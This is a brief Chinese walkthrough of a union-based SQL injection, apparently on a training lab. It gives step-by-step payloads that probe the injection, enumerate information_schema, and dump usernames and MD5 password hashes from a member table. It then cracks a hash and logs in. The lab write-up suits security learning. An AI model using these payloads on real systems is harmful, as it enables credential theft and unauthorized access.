输入’ “发现都是空白页面
尝试 and 1=1 #
页面正常
再尝试 and 1=2#
页面异常所以判断为整数型注入
然后输入 order by 1# 判断列数
4对5错即总共有四列
联合查询:union select 1,2,3,4# 不要忘记把前面id=1改为-1
回显点为2 3,随便选一个 查数据库名
输入union select 1,database(),3,4#
知道库名接下来就是查表明
输入 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=’mozhe_Discuz_StormGroup’),3,4#
这里引号不要复制容易变成中文引号 手打引文引号
查出库名,接下来查字段 第二个表看起来就没什么好东西,我们直接查第一张表
输入union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=’mozhe_Discuz_StormGroup’ and table_name=’StormGroup_member’),3,4#
可以看出name和password
我们直接查询
输入 union select 1,(select group_concat(name,password) from StormGroup_member),3,4#
成功查询出用户名和密码
这里第一个用户密码被禁用了,直接用第二个就好了。但是这里密码用了md5加密,去网上随便找一个md5解密
登录成功